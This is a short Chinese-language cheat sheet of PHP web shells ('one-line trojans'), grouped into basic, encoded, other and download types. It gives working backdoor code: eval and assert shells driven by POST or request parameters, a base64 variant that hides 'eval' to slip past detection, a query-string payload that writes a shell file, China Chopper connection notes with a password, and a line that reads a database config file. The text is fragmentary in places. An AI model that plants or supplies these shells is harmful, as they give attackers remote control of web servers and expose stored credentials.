一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:
二、编码的替换的类型:
//会生成<?php @eval($_POST['lostwolf']);?>
//php在html内部的一种嵌入方式
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>
三、其他类型:
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
<?php assert($_REQUEST["pass"]);?> //菜刀连接 躲避检测 密码pass
//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass
四、下载类型:
echo file_get_contents("..//cfg_database.php");?> //显示某文件
e